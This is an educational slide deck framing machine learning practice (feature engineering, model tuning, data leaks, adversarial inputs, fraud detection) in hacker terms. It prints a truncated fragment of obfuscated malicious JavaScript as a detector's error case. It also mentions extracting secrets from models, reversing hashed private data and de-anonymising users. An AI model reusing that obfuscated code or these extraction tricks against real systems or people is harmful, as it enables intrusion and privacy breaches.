Hacking Predictive Modeling
HJ van Veen - Data Science & InfoSec @ Nubank
“Do machine learning like the great [hacker] you are, not like
the great machine learning expert you aren’t.” - Zinkevich

Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
Who am I?
• Thankful for the opportunity to speak here!
• Data scientist & InfoSec analyst at Nubank

• Competitive data science fanatic

• Horrible Portuguese speaker (more so with public
speaking). Questions and clarifications in English please.

• @mlwave
Disclaimer
• These slides are for entertainment, educational and
research purposes only.

• ML is powerful and easy: “As every scientific discovery gives
more power over nature, it can increase good or evil.”
- César Lattes

• Hacking is fun: But not a substitute for rigorous study and
theory. Think of the impact your ML solution has on users.



acm.org/code-of-ethics
Scope
• This presentation will be all over the place: I don’t know
whether you have never trained a model before or are
experienced with ML.

• But I hope this presentation will be interesting for
hackers, makers, and creators of all types.

• Catch me afterwards if you want to talk about
hyperparameter optimization.

What is AI?

[Image slides: Self-Normalizing Neural Networks (2017, Klambauer et al.); A Tutorial on Energy-Based Learning (2006, LeCun et al.)]

[Image slide: Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.); generated captions: “Boy holds baseball bat”, “Cat sits on couch”]
What is AI?
• AI grew out of Operations Research after WWII

• AI consists of many diverse subfields, drawing on:
Psychology, Neuroscience, Mathematics, Linguistics,
Learning Theory, (Quantum) Physics, Computer Science,
Information Theory, Statistics, Robotics, Philosophy, and
Machine Learning.
• Fight hype. Just replace the word `AI` with `Software`: if the
result sounds silly or obvious, then the application of AI
usually is too. Power word: “What is your false positive rate?”


What is Machine Learning?
• Automatically learn from data

• Increased business usage: AI, Machine Learning, Software
will continue eating the world.
• Unsupervised learning (Amazon Recommendations).
Supervised learning (Spam classification). Reinforcement
learning & Self-supervision/Self-play (AlphaGo).
• Consists of: Engineering, research, data management,
domain expertise, analysis, decision science, safety, legal,
ethics, UX, monitoring, predictive modeling.

Why Software Is Eating the World (2011, Andreessen)
What is Predictive Modeling?
• Puts the focus on creating predictions:

• which model to use,
• how to use the data,
• how to get good accuracy.

• Essential for creating a first solution, but only the bare
minimum of what goes into Machine Learning at commercial
scale. ML competitions are largely about predictive modeling.
Useful Paradigms
• Functionalism: Input -> Function -> Output

• Connectionism: Learn from data bottom-up, not top-down,
by stacking learning primitives.

• Black Box Learning: Let the machine do the work. Don’t
care if I understand what it does.

• Coding Theory: Error detection and compression
Functionalism
• Philosophy of Mind: Mental states are defined by how they
function, not defined by what they are made of.
• Function does not depend on the material: You can build a
functional mouse trap from wood or metal.

• Perhaps we can model functional intelligence with
computers too?



Functionalism

Input -> Transform -> Model -> Output
Reality -> Sensory Processing -> Mental Modeling -> Behavior
Data -> Feature Engineering -> Predictive Modeling -> Predictions
Connectionism
• Philosophy of Mind: Cognition can arise by connecting
functional nodes to form a network structure.

• Artificial Neural Nets & Deep Learning are examples of this
approach: Stacking layers of nodes for ever higher-level
learning

• Perhaps we can model intelligence with network
architectures too?



Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
Connectionism

[Diagram: the Pandemonium architecture, in layers: Image Demons -> Feature Demons -> Cognitive Demons -> Decision Demons]

Pandemonium: A paradigm for learning (Selfridge, 1959)
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
"A labrador retriever
puppy with tongue
hanging out"
Black Box ML
• Don’t care if there is a magical demon or a complex
maths formula in the box.
• The question then becomes: how to transform the data and
how to parametrize the black box so as to get the best
predictions?
• Remember: Garbage in, garbage out (don’t trust it for
critical stuff like healthcare, self-driving cars, or AGI)
The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
Coding Theory
• Coding theory is concerned with effective communication
and data integrity
• Cryptography, Error Correction, Data Compression: All
about finding (or hiding) the signal in the noise.
• Machine Learning is essentially learning to correct errors.
• Data compression, just like ML, is about finding the most
relevant patterns.
Coding Theory
[Image: the same picture at 1 MegaByte and at 180 KiloByte after compression]
Data
• Data can be structured or unstructured.
• Tabular data is structured and can be used more readily.

• Text, sound, and images are unstructured.

• Data can be temporal, for instance: time-series.

• Rarely, data is in the shape of a graph (for instance,
relations between gang members)
Feature Engineering
• Most data needs to be converted to numbers first

• Feature engineering:

Input -> Transform -> Model -> Output
Data -> Feature Engineering -> Predictive Modeling -> Predictions
Feature Engineering
• Feature engineering:

• is transforming data into something a model can
understand.
• Creative part of ML with enough tricks to write a book
• Has a few basic tricks that are enough to get most
models to work well.

Feature Extraction - Foundations and Applications (Guyon et al., 2006)
Feature Engineering: Tricks
• Categorical Variables

• One-hot encoding for neural nets:

         Red  Green  Blue
  Red     1     0     0
  Green   0     1     0
  Blue    0     0     1

• Label encoding for decision trees:

  Red   -> 1
  Green -> 2
  Blue  -> 3
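
A minimal sketch of both encodings in Python, using pandas and scikit-learn (note that scikit-learn's LabelEncoder numbers the classes alphabetically starting at 0, not 1 as in the table above):

import pandas as pd
from sklearn.preprocessing import LabelEncoder

colors = pd.Series(["Red", "Green", "Blue"])

# One-hot encoding: one binary column per category (for neural nets).
print(pd.get_dummies(colors))

# Label encoding: one integer per category (for decision trees).
# LabelEncoder assigns integers in alphabetical order: Blue=0, Green=1, Red=2.
print(LabelEncoder().fit_transform(colors))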
Feature Engineering: Tricks
• That’s really (mostly) it!

• You can now apply the most advanced machine learning
algorithms to any data with something you want to predict.

• More advanced feature engineering uses domain
expertise, intuition, unsupervised learning/embeddings,
and automation (see FeatureTools).

Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
Modeling
• A model tries to give accurate predictions for new unseen
data.
• It uses training data together with labels/ground truth/what
you want to predict.
Input -> Transform -> Model -> Output
Data -> Feature Engineering -> Predictive Modeling -> Predictions
Modeling
Gender   Likes Open Source?   Wants RoadSec ticket?
  1              1                      1
  0              1                      1
  1              1                      0
  0              1                      1
  1              0                      0
  0              0                      0
  1              0                      0
  0              0                      0
Modeling
Gender   Likes Open Source?   Wants RoadSec ticket?
  0              1                      ?

• Gender did not show any correlation, and 3/4 of people who
like Open Source also wanted a RoadSec ticket.
• A good model may predict a probability of 0.75, or a hard
prediction of 1.
Modeling
• Which model do you use for which data?

• Tabular data: Gradient boosted decision trees (XGBoost)

• Images: Pre-trained deep neural net (or Detectron)

• Text: TFIDF -> Logistic Regression (or FastText, ULMFiT,
BERT)
Search for above terms in combination with “machine learning”
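
As an illustration of the text recipe, a minimal sketch of a TFIDF -> Logistic Regression pipeline (assuming a list of strings `texts` and labels `y`; the spam-like example string is hypothetical):

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# TFIDF features flow straight into Logistic Regression as one estimator.
clf = make_pipeline(TfidfVectorizer(ngram_range=(1, 2)), LogisticRegression())
clf.fit(texts, y)
print(clf.predict(["free tickets, click here!"]))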
Evaluation

Gender   Likes Open Source?   Wants RoadSec ticket?
  1              1                      1
  0              1                      1
  1              1                      0
  0              1                      1
  1              0                      0
  0              0                      0
  1              0                      0
  0              0                      0

Train on one subset of the rows, then predict on the held-out
rows. Repeating this with different train/predict splits gives a
more trustworthy evaluation.

The Elements of Statistical Learning (2001, Friedman et al.)
Evaluation

Predictions   Wants RoadSec ticket?
     1                  1
     1                  1
     1                  0
     1                  1
     0                  0
     0                  0
     0                  0
     0                  0

7/8 Accuracy Score
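
The same train/predict evaluation, sketched with scikit-learn (assuming a feature matrix `X` and labels `y` already exist):

from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split

# Hold out a quarter of the rows, train on the rest,
# and score the predictions on the held-out rows.
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.25, random_state=0)
model = GradientBoostingClassifier().fit(X_train, y_train)
print(accuracy_score(y_test, model.predict(X_test)))  # e.g. 7/8 = 0.875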
Optimization
• A Python classifier may look like:



FactorizationMachineBinaryClassifier(
    iters=5, learning_rate=0.1, latent_dim=20, radius=0.5,
    lambda_linear=0.0001, lambda_latent=0.0001,
    normalize='Auto', norm=True, caching='Auto',
    shuffle=True, verbose=True)
The trick is to tweak these parameters to get a better evaluation,
then stop when any change makes the evaluation worse.
Brute Forcing
• View hyperparameter optimization as a password-cracking
task

• Enumerate or randomly try all possible parameters within a
range.

• Dictionary attack: Use “password dictionary files” with good
parameters that worked on other problems. Try these first.

• This is basically Random Search or Adaptive Search

Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
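
A sketch of this idea with scikit-learn's RandomizedSearchCV; the parameter ranges below play the role of the "dictionary" of values that tend to work on other problems (`X` and `y` are assumed to exist):

from scipy.stats import randint, uniform
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import RandomizedSearchCV

# 50 random "password guesses" drawn from plausible parameter ranges.
search = RandomizedSearchCV(
    GradientBoostingClassifier(),
    param_distributions={
        "n_estimators": randint(50, 500),
        "learning_rate": uniform(0.01, 0.3),
        "max_depth": randint(2, 8),
        "subsample": uniform(0.5, 0.5),  # uniform(loc, scale): 0.5 to 1.0
    },
    n_iter=50,
    cv=3,
)
search.fit(X, y)
print(search.best_params_, search.best_score_)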
Brute Forcing
• How to find the best weights for an average ensemble?
• Is it differentiable?
• Which optimizer do we pick?
• Do we set any regularization?
• Allow negative weights?

• How about trying every possible combination of weights
and picking the best evaluation (see the sketch below)?
Worst case: you spend 2 more hours of compute.

KazAnova@kaggle
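
A sketch of brute-forcing averaging weights for three models, assuming out-of-fold prediction arrays `p1`, `p2`, `p3` and true labels `y_true` already exist:

import itertools
import numpy as np
from sklearn.metrics import roc_auc_score

best_auc, best_w = 0.0, None
# Enumerate every weight triple on a 0.05 grid that sums to 1.
for a, b, c in itertools.product(range(21), repeat=3):
    if a + b + c != 20:
        continue
    w = np.array([a, b, c]) / 20.0
    auc = roc_auc_score(y_true, w[0] * p1 + w[1] * p2 + w[2] * p3)
    if auc > best_auc:
        best_auc, best_w = auc, w
print(best_auc, best_w)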
Brute Forcing
• Do we really need to manually train all these models?

• What would happen if we automatically trained 1,000
random models with random data transformations and
threw them all into another black box?

• Out comes a winning Kaggle submission…


Kaggle Ensembling Guide (van Veen et al., 2015)
Fuzzing with Permutations
• View feature interaction expansion/feature selection as a
fuzzing task.
• Train a model and evaluate on a test set.

• For every column in the test set:
• randomly shuffle the column,
• generate predictions on the shuffled data and evaluate them,
• if the evaluation is better with the randomly shuffled
feature, then you can safely discard the column (see the
sketch below).

 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle
See Fast.AI tutorial for more on this technique.
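
A sketch of the permutation fuzzing loop, assuming a fitted `model`, a pandas DataFrame `X_valid`, labels `y_valid`, and accuracy as the metric:

from sklearn.metrics import accuracy_score

base = accuracy_score(y_valid, model.predict(X_valid))
for col in X_valid.columns:
    shuffled = X_valid.copy()
    # Break the column's relationship with the target by shuffling it.
    shuffled[col] = shuffled[col].sample(frac=1).to_numpy()
    score = accuracy_score(y_valid, model.predict(shuffled))
    if score >= base:
        print(f"{col}: candidate to discard (no worse when shuffled)")
    else:
        print(f"{col}: importance ~ {base - score:.4f}")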
Script kiddies
• Use tools developed by others
to attack a machine learning
problem.
• The ML community is incentivized
to share easily replicable code.
• Wield same power as the
biggest AI companies in the
world.
• No shame in this! Start
somewhere, why not near the
top?

Warez
• Good tools: 

• allow you to experiment and iterate quickly

• have an active community contributing new features

• can be applied to many different problems with similar
results.

• abstract away complexity.

Python
• Grown to be essential to data science and machine
learning. 

• Learn Python The Hard Way and you have access to an
amazing machine learning stack.
• Then learn “one-- and preferably only one --obvious way to
do it.”
• Python code can read like pseudo-code

PEP 20 — The Zen of Python (Peters, 2004)
Beat the benchmark with less than 200MB of memory (tinrtgu, 2014)
Python
from sklearn import datasets, ensemble

# Load the classic iris dataset: 150 flowers, 4 numeric features, 3 classes.
iris = datasets.load_iris()
X = iris.data
y = iris.target

# Fit a gradient boosting classifier, then predict.
model = ensemble.GradientBoostingClassifier()
model.fit(X, y)
p = model.predict(X)  # demo only: predicting on the training data

Scikit-Learn
• The Metasploit of Machine Learning

• Uses one API for all models (models are all trained the
same way, so learn it only once, and have access to all
models)

• Could get by for a while learning only this library very well

Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
XGBoost
• The best for tabular data: 

• Extremely fast
• Very good performance
• Can model complex problems
• Supports Scikit-Learn API

• Alternatives: GradientBoostingClassifier, CatBoost,
LightGBM.
XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
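
Thanks to the Scikit-Learn API support, XGBoost follows the same fit/predict pattern. A sketch, assuming arrays `X_train`, `y_train`, and `X_test` exist:

from xgboost import XGBClassifier

# Same API shape as any scikit-learn estimator.
model = XGBClassifier(n_estimators=200, max_depth=6, learning_rate=0.1)
model.fit(X_train, y_train)
probs = model.predict_proba(X_test)[:, 1]  # probability of the positive class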
Keras
User-friendly wrapper around deep learning libraries such as
TensorFlow.
• Learn Keras and you can work with the latest architectures
in deep learning.

• Alternatives: PyTorch with Fast.AI library



Deep Learning with Python (Chollet, 2017)
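
A minimal Keras sketch of a binary classifier, assuming `X_train` has `n_features` columns and `y_train` holds 0/1 labels:

from tensorflow import keras

model = keras.Sequential([
    keras.layers.Dense(64, activation="relu", input_shape=(n_features,)),
    keras.layers.Dense(1, activation="sigmoid"),
])
model.compile(optimizer="adam", loss="binary_crossentropy",
              metrics=["accuracy"])
model.fit(X_train, y_train, epochs=10, batch_size=32, validation_split=0.1)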
Vowpal Wabbit
• Very fast online learning on data bigger than memory.

• Can be faster and more accurate than Hadoop/Spark.
• Uses a cool hashing trick inspired by Bloom filters.
• Support for contextual bandits (automated decision
making).
• Eats raw features:

1 '10000074 |f category_x_transport emails_cnt:0.0 emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii exclamationmark 2005
A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
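
The same hashing-trick idea is available in scikit-learn's HashingVectorizer: features are hashed straight into a fixed number of columns, so no vocabulary ever has to fit in memory. A sketch of the concept, not VW's actual code path:

from sklearn.feature_extraction.text import HashingVectorizer

# Hash tokens into a fixed 2**18-dimensional sparse feature space.
vec = HashingVectorizer(n_features=2**18)
X = vec.transform(["category_x_transport emails_cnt_x_0 avtomobil_ v ideal_nom"])
print(X.shape)  # (1, 262144), sparse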
Pandas & NumPy & SciPy
• Read and manipulate tabular data with Pandas

• Fast, scalable and supports many types of data

• Perform vector operations on NumPy (or Numba) arrays

• Wide support for scientific calculations


Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
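
A typical wrangling sketch ("data.csv" and the column names are hypothetical):

import numpy as np
import pandas as pd

df = pd.read_csv("data.csv")                                 # hypothetical file
df["emails_per_day"] = df["emails_cnt"] / df["days_active"]  # vectorized, no loop
X = df.select_dtypes(include=np.number).to_numpy()           # NumPy array for models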
Reverse Engineering
• Use frequency tables to reverse engineer the data to its
original form.

• label:TF -> English_word_frequency(IDF(label)) ->
Porter_Stemmer(word):TF*IDF

• feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) -> State:New_York
Tricks as seen on the Kaggle forums
Reverse Engineering
• Use model predictions to reverse engineer the training
data.

• A simple brute-force search over a fitted language model
can retrieve:
• Credit Card Numbers
• Social Security Numbers / CPFs
• ...if the model has seen them even once before (DL is
good at memorization)
The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
Social Engineering
• You cannot survive in most businesses
with just predictive modeling.

• Companies don’t hire an AutoML
solution, they hire people.

• The majority of the day-to-day
complexity in the chain between data
infrastructure and decision makers
is social, not technical.
Social Engineering
• How do you gain access to the online data science community?

• Compete together.
• Write a cool blog about it.
• Write/contribute Open Source projects.
• Write tutorials / step-by-step guides.

• Basically, share everything: a 100-line Python script (a toy
wrapper for Regularized Greedy Forest) could grow into a
professional project that you can then use yourself.
https://github.com/RGF-team/rgf
Operational Security
• Business:
• Keep pipelines simple
• Document & Revisit
• Automate, Test & Monitor

• Competitions:
• Loose lips sink ships: Be careful what competitive
advantage you share
• Show, not tell: Save your most powerful models until the
very last.
Hacking Leaderboards
• Always wanted to rank #1 on a leaderboard?

• Wacky Boosting:
• Keep changing your submission
• Use leaderboard feedback to see if it was a good change
or a bad change.
• Keep good changes.
• Repeat until you are #1

• Will horribly overfit, but can also cause others to overfit!
(See the sketch below.)
Competing in a data science contest without reading the data (2015, Hardt)
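
A sketch of the idea from Hardt's post, assuming a hypothetical `submit()` function that returns the public leaderboard accuracy for a candidate label vector:

import numpy as np

n = 1000                                  # number of test rows
good = []
for _ in range(100):
    y = np.random.randint(0, 2, size=n)   # a random guess
    if submit(y) > 0.5:                   # hypothetical leaderboard oracle
        good.append(y)                    # keep only the "lucky" guesses

# Majority vote over the lucky guesses overfits the public leaderboard.
final = (np.mean(good, axis=0) > 0.5).astype(int)
submit(final)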
Information Snooping
• Normally it is not advisable to use the test set. But in
competitions the test set is available, so:

• You can use semi-supervised learning to extract information
from the test set (see the sketch below). Use the test set for:

• Frequency (TFIDF) or pre-training language models
• Fitting dimensionality reduction
• Adding confident predictions as labels to train set
github.com/gatapia Guido Tapia
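
For example, fitting the vectorizer on train plus test text (assuming lists of strings `train_texts` and `test_texts`):

from sklearn.feature_extraction.text import TfidfVectorizer

# Term frequencies are computed over train AND test documents.
vec = TfidfVectorizer().fit(train_texts + test_texts)
X_train = vec.transform(train_texts)
X_test = vec.transform(test_texts)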
Rainbow tables
• Sometimes categorical variables are hashed to obscure
them.

• Can use rainbow tables to reverse (truncated) MD5 hash
and get the original feature.

• One time, this was obfuscated ordinals for a job puzzle
• One time, this was private data: IP addresses. Oops!
• One time, they forgot to obfuscate a misspelled patient
name in a psychiatric report. Oops!
Breaking Stuff
• Keep asking your curious self:
What would happen if I changed
this to that? Be Bold!

• Local evaluation is your lifeline.

• Try everything, keep the good.

• Once I got an accuracy of 181% by
submitting correct answers twice.
[Diagram: “Statisticians” vs. “Machine Learners”, with the overlap labeled “Smart Machine Learner” (the joke is that there are only smart statisticians)]

Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
DataLeaks
• A very common mistake, and one that can be deadly for
business and science, so become good at finding leaks.
• Example: the task was to predict cancer, and one of the
variables was “underwent surgery for cancer, yes/no”.
• You cannot use data that is not reasonably available at
test time (or your lifeline, the evaluation, cannot be trusted).
Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
DataLeaks
• Beware: the more powerful your model, the bigger the
chance it exploits any leakage you did not find.
• The most powerful model is a thousand data scientists on a
typewriter, which is why competitions see more leakage
discovered.

• A large amount of leakage may simply go undetected.
Ben Hamner & Will Cukierski @ Kaggle
DataLeaks
• Winners of the Microsoft malware binary classification
challenge (2015) were able to extract the desktop icon from
the code.
Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
Sub-Linear Debugging
• Output information while your computations are running;
essential for iteration speed:
• You can spot very fast whether a change was good or bad.
• Feels like Neo in the Matrix if you do this with the data
itself during data reading.
• You can spot data health issues (text encoding errors,
everything missing in the same row of data, etc.). See the
sketch below.
Online Learning and Sub-Linear Debugging (Mineiro, 2014)
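
A sketch of the pattern, assuming a hypothetical example `stream` and an online `model` with partial_fit/predict. Printing at exponentially spaced counts keeps logging cost sub-linear in the number of examples:

next_print, seen, errors = 1, 0, 0
for x, y in stream:                 # hypothetical data stream
    p = model.predict([x])[0]       # predict before learning (progressive validation)
    errors += int(p != y)
    model.partial_fit([x], [y])
    seen += 1
    if seen == next_print:
        print(f"examples={seen:>9}  running error rate={errors / seen:.4f}")
        next_print *= 2             # print at 1, 2, 4, 8, ... examples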
Error Debugging
• See where your model makes the biggest mistakes,
• then try to fix them by creating new features.
• The sample below was confidently predicted as minified JS
when it was actually obfuscated malicious JS:











4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Warsaw.js
Error Debugging
• How to fix?
• Add count of numbers / count of characters
• Add human-readability score
• Add count of “x” / count of characters
Dumpster Diving
• You should find out the sources and shapes of all your
data, then do a deep dive:

• Winners of the IJCNN 2011 Challenge wrote a Flickr
crawler to de-anonymize users and obtain the ground truth.

• Winners of the West Nile Virus Prediction Challenge found
research papers which contained part of the ground truth.



Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayanan et al.)
Adversarial Input
• These people are invisible to a percentage of modern face detection systems.
CV Dazzle (Harvey et al., 2010)
Adversarial Input
• This image is confusing to modern object detection.
[Caption: “A foreign attack helicopter firing missiles”]
Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
Adversarial Input
• Being able to fool neural networks, or build strong
defenses against adversarial images is hugely valuable.

• NIPS2018: Defense Against Adversarial Attack
• Goodfellow et al.: CleverHans
• Google: Unrestricted Adversarial Examples Challenge
Adversarial Thinking
• Pretend you are an Identity Fraudster:
• Do you hack at night or during your day job/school?
• Do you change details like email to match your victim’s
name?
• Are you more likely to use Windows or Linux?
• Do you move location often, or use Tor to hide your
location?
• Do you try to get as much money as fast as possible, or
are you more patient?
• Do you memorize your victim’s personal details?



Adversarial Thinking
• Try to attack a system, then invent safeguards:
• Encode time of day of the attempt
• Look at string distance between legal name and email
name
• Deduce operating system from user agent string
• Check if IP was used for malicious behavior before
• Check if IP is a Tor IP
• Check how long the user spends in the funnel / form behavior
• Check if the user demands an unusually high limit
• …
Statistical Fraud Detection: A Review (Bolton et al., 2002)
Botnet
• Much of commercial ML can be, or already is, automated.
Much of advertisement fraud is automated already.
• It is possible to get a good score in a competition
completely automatically.
• You can aggregate the results of many (automated)
agents and get an even better result.
• Thinking back to the ID fraudster example. Can you
imagine how to cheat a ML competition? Could you
encode ways to safeguard against this?
Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
Case Study: Higgs Boson
• “Science cannot predict what will happen. It can only
predict the probability of something happening.” - César Lattes

• Use data from the ATLAS experiment to identify the Higgs
boson (probability of it being signal or background noise)

• No knowledge of particle physics is required.

• XGBoost was a 0-day during the competition (this could’ve
been you!)
Higgs Boson Detection Challenge (2014, Kaggle & CERN)
Case Study: Higgs Boson
• Let’s hack together a solution:
• Create random feature interactions and use Permutation
Feature Importance to select the best ones
• Add the best interactions to the data
• Train 50 randomly initialized XGBoost models
• Pick the best log-loss model, then lower the learning rate
and use early stopping to find the best number of trees.
• Repeat the above 3 times and average the results (see the
sketch below).
Position: 30/1785
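
A compressed sketch of that recipe, not the winning code: arrays `X_train`, `y_train`, `X_valid`, `y_valid` are assumed to exist, and note that early_stopping_rounds moved from fit() to the constructor in xgboost >= 1.6.

import numpy as np
import xgboost as xgb
from sklearn.metrics import log_loss

rng = np.random.RandomState(0)
run_preds = []
for run in range(3):
    # Train 50 randomly configured models, keep the best by log loss.
    best_score, best_params = np.inf, None
    for _ in range(50):
        params = dict(
            max_depth=int(rng.randint(4, 10)),
            subsample=float(rng.uniform(0.6, 1.0)),
            colsample_bytree=float(rng.uniform(0.6, 1.0)),
            learning_rate=0.1,
            n_estimators=200,
        )
        model = xgb.XGBClassifier(**params).fit(X_train, y_train)
        score = log_loss(y_valid, model.predict_proba(X_valid))
        if score < best_score:
            best_score, best_params = score, params

    # Lower the learning rate; early stopping picks the number of trees.
    best_params.update(learning_rate=0.01, n_estimators=5000)
    final = xgb.XGBClassifier(**best_params, early_stopping_rounds=50)
    final.fit(X_train, y_train, eval_set=[(X_valid, y_valid)], verbose=False)
    run_preds.append(final.predict_proba(X_valid)[:, 1])

avg_pred = np.mean(run_preds, axis=0)  # average the three runs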
Further Learning
• MOOCs: Andrew Ng’s Machine Learning on Coursera,
Competitive Data Science on Coursera, Abu-Mostafa’s
Caltech Learning from Data
• Platforms: Kaggle (Tutorials, Projects, Competitions,
Forums, Kernels)
• Programs: Fast.AI (Learn deep learning state-of-the-art)
• Meetups: Sao Paulo Machine Learning Meetup
• Books: Programming Collective Intelligence
• Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun!
• Professors: Find cool professor and study their online output
Nubank is hiring! nubank.workable.com
